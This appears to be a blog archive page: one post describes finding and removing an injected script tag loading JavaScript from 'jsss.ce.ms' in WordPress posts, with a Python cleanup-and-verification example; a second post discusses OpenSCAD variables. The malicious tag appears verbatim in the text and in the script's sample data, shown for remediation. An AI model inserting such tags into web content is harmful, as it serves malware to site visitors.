How to clean a “jsss.ce.ms” SQL injection

Well, that was exciting.  Apparently my website had been attacked by some kind of SQL injection.  I was curious if my self-hosted WordPress website had been attacked like 4,300 others.  After some digging around, I found that this was not the case.  A scan by UnmaskParasites.com revealed nothing unusual.  However, a scan by Sucuri’s SiteCheck revealed some JavaScript malware entries in some posts.

I say “some” posts.  By this I mean 3300 posts and post revisions dating back to the very first blog entry on this website going to as recently as July 13, 2011.  Not including this post, I’ve got 721 published blog entries – with almost all containing this little gem:

<script type="text/javascript" src="http://jsss.ce.ms/16"></script><script type="text/javascript" src="http://jsss.ce.ms/16"></script>

Here’s what I did to clean this infection:

  • Copied my entire “_posts” to “_posts2”
  • Copied my entire “_posts” to “_posts3”
  • Downloaded “_posts3” as a CSV
  • Found and replaced all instances of the above script in the CSV with “”
  • Deleted the contents of “_posts3”
  • Uploaded the altered CSV into “_posts3”
  • Renamed “_posts” to “_posts1” and “_posts3” to “_posts”
  • Done!
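The find-and-replace step can also be scripted so that it counts what it removed and confirms nothing is left behind. The following is an added example, not code from the original post; it assumes the CSV export has a header row with a `post_content` column, and the sample rows are constructed.

```python
import csv
import io
import re

# <script> element whose src points at the injected host (host taken from the
# page). Tolerates straight or typographic quotes and extra attributes.
INJECTED = re.compile(
    r"<script\b[^>]*\bsrc\s*=\s*[\"'\u201c\u201d]?https?://jsss\.ce\.ms/[^>]*>"
    r"\s*</script\s*>",
    re.IGNORECASE,
)

def read_rows(csv_text):
    """Parse CSV text (header row required) into a list of dicts."""
    return list(csv.DictReader(io.StringIO(csv_text, newline="")))

def clean_posts_csv(csv_text, column="post_content"):
    """Return (cleaned_csv_text, rows_changed, tags_removed)."""
    rows = read_rows(csv_text)
    out = io.StringIO(newline="")
    writer = csv.DictWriter(out, fieldnames=list(rows[0].keys()), lineterminator="\n")
    writer.writeheader()
    rows_changed = tags_removed = 0
    for row in rows:
        row[column], n = INJECTED.subn("", row[column])
        rows_changed += 1 if n else 0
        tags_removed += n
        writer.writerow(row)
    return out.getvalue(), rows_changed, tags_removed

def residual_hits(csv_text):
    """Count any remaining reference to the host, in any column or form."""
    return len(re.findall(r"jsss\.ce\.ms", csv_text, re.IGNORECASE))

# Constructed sample export: a doubled tag, a clean row, and a legitimate script
# next to a curly-quoted injected tag inside a multi-line field.
SAMPLE = (
    'ID,post_title,post_content\n'
    '1,First,"Hello<script type=""text/javascript"" src=""http://jsss.ce.ms/16""></script>'
    '<script type=""text/javascript"" src=""http://jsss.ce.ms/16""></script>"\n'
    '2,Clean,"No scripts here"\n'
    '3,Mixed,"<script src=""/js/site.js""></script>line one\nline two'
    '<script type=\u201dtext/javascript\u201d src=\u201dhttp://jsss.ce.ms/16\u201d></script>"\n'
)

if __name__ == "__main__":
    cleaned, changed, removed = clean_posts_csv(SAMPLE)
    print(f"rows changed: {changed}, tags removed: {removed}, "
          f"residual: {residual_hits(cleaned)}")
```

A non-zero residual count after cleaning means the host is referenced in a form the pattern did not cover, or in another column, and those rows need a manual look before the table is swapped back in.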

It’s definitely possible to create a little WordPress plugin to clean this kind of an infection out, but there’s little incentive to do so when the manual fix is relatively easy.  If you’ve got this kind of an infection in your site and don’t know how to take care of it, drop me a line.

The cake was a lie

So, I’m just learning OpenSCAD when Tony Buser leaves this comment:

This should be in the next version I believe, see: http://gitorious.org/openscad/openscad/commit/d479fca855688c92f4a9f72f4ec18d655c3b351d

Also, you can set variables on the command line like this:
http://en.wikibooks.org/wiki/OpenSCAD_User_Manual/Using_OpenSCAD_in_a_command_line_environment So you could set a variable to a random value in a shell script too.

Unfortunately, since variables aren’t really variable in openscad, it’s often easier to write code in another language that writes out openscad code. :(

Okay, what the hell.  “Variables aren’t really variables”?  What does that mean?  Yes, yes, OpenSCAD is written using a keyboard, but not really a keyboard.  T, are you just messing with me or what?  How the heck am I supposed to learn this language with this kind of nonsense?!

Amusingly, Tony is the second person to mention that sometimes it’s easier to use another language to write OpenSCAD.  Kidding aside, I kinda get that.  I use PHP to write custom JavaScript and MySQL all the time, since I sometimes have need for more dynamic-ness than those languages can accommodate. 1

  1. And, as we all know, I’m ever so dynamic